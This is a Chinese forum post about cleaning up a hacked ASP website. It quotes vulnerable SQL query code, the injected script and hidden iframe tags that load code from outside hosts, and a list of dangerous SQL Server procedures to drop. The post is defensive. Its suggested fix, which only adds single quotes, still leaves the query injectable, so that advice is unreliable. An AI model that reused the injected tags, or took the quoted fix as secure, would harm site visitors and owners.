这问题我遇见过。也在这里发过求救,最后总结是: 这总情况没有什么软件可以帮你修复,必须靠自己一个文件一个文件的是检查,看是不是程序上有漏动,决大多数是程序有漏动。 比如: 在ASP里有这个一段话, <% ID=request("ID") rs.open "select * from tmptabel where id=" & ID %> 以上这句话非常容易成为入侵者下手的地方,必须加固一下 <% ID=request("ID") 要设法检查这个值,如不是数值就停用它, rs.open "select * from tmptabel where id='" & ID & "'" 把这个值有单引号括上 %> 在检查过所有文件确定程序里没有这类SQL写法的漏洞后。接下来就要全部替换掉所有页面里的非法插入的<script type="text/javascript" src="http://www.mitaodd.com/ceshi/ok.js"></script> <iframe src=http://www1.89382.cn/51.htm width=0 height=0></iframe> 这个东东,(可以用Macromedia Dreamweaver这类软件对网站文件进行检查),或将内部的网站把服务器上的全部复盖,确定全部删除后,接下来就该在网站内仔细查看有没有不是你的文件夹或文件,删除它,不能留情,这一部是很重要的(包括隐藏文件)。再就检查服务器内有没有可疑的执行文件,一般都在根目录下,最好都看看,有就删别留情。 最后是屏闭掉SQL的一个危险存储过程,如: /********************************************************************* 以下列出的都是危险的内置存储过程,全在我们封杀之列 xp_cmdshell xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring Xp_regwrite
sp_OAcreate sp_OADestroy sp_OAMethod sp_OAGetProperty sp_OASetProperty sp_OAGetErrorInfo sp_OAStop
sp_makewebtask
/********************************************************************* 以下为屏蔽上面所说的危险内置存储过程 sp_dropextendedproc 'xp_cmdshell' go sp_dropextendedproc 'xp_regaddmultistring' go sp_dropextendedproc 'xp_regdeletekey' go sp_dropextendedproc 'xp_regdeletevalue' go sp_dropextendedproc 'xp_regenumkeys' go sp_dropextendedproc 'xp_regenumvalues' go sp_dropextendedproc 'xp_regread' go sp_dropextendedproc 'xp_regremovemultistring' go sp_dropextendedproc 'xp_regwrite' go sp_dropextendedproc 'sp_OACreate' go sp_dropextendedproc 'sp_OADestroy' go sp_dropextendedproc 'sp_OAMethod' go sp_dropextendedproc 'sp_OAGetProperty' go sp_dropextendedproc 'sp_OASetProperty' go sp_dropextendedproc 'sp_OAGetErrorInfo' go sp_dropextendedproc 'sp_OAStop' go
drop procedure sp_makewebtask
|